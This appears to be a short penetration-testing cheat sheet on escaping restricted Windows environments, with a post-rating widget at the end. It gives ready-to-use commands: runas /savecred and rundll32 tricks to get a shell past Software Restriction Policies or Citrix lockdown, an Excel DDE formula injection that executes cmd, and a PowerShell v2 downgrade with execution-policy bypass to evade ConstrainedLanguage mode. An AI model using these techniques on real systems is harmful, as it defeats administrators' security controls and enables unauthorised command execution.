✅ Environments escape

Escape Citrix or cmd.exe disabled by SRP

runas /savecred /user:$USERNAME calc.exe
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

I.e.:

rundll32.exe user32.dll,LockWorkStation
start cmd

Escape Excel

Excel command execution through a macro:

=cmd|'/C calc.exe'!__xA1

Escape PowerShell

Powershell evasion inside ConstrainedLanguage mode:

Method 1: Downgrade powershell to v2

powershell.exe -Version 2 -ep bypass -nop

Method 2: runas powershell ?

How useful was this post?

Click on a star to rate it!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?